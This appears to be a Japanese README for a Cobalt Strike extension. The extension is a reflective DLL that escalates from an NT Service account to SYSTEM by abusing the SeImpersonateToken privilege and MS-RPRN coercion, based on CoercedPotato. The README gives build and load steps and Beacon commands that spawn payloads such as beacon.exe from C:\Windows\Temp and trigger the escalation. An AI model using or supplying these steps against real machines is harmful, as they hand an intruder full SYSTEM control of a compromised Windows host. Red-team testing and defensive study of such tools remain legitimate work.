
SeImpersonateToken 特権を使用して NT Service から SYSTEM へ権限昇格する Reflective DLL
SeImpersonateToken 権限と MS-RPRN 関数を使用して、NT サービスから SYSTEM への権限昇格を実現します。
大部分は https://github.com/Prepouce/CoercedPotato に基づいています。
Reflective Loader は https://github.com/stephenfewer/ReflectiveDLLInjection から取得しています。
このリポジトリをクローンし、VisualStudio でプロジェクトをコンパイルしてから、dist/coercedpotato.cna を CobaltStrike にロードしてください。
まず、以下のコマンドで RPC リスナーを起動する必要があります。
beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument
例:
beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin
その後、SYSTEM 呼び出しをトリガーできます。
beacon> CoercedPotato coerce